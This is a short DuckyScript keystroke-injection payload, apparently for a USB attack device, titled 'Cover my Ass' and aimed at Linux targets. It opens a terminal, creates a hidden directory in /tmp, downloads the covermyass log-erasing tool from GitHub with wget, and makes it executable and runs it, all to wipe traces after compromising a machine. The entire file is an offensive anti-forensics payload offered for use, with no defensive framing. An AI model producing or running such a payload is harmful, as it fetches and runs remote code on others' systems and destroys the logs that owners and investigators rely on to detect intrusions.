REM Title: Cover my Ass
REM Author: Gallier
REM Description: clean up a little bit after connecting a target
REM Target: Linux
REM Props: Gallier
REM Version: 1.0
REM Category: untested


REM ==================================================
REM = Start Program                                  =
REM ==================================================

DELAY 1000
CTRL-ALT t
DELAY 500
STRING mkdir /tmp/.secret
DELAY 750
STRING cd /tmp/.secret
DELAY 750
STRING wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass
DELAY 5000
STRING chmod +x covermyass
DELAY 750
STRING ./covermyass
DELAY 1000
REM ==================================================
REM = END Program                                    =
REM ==================================================

REM don't forget to remove hidden dir!
REM have fun ...
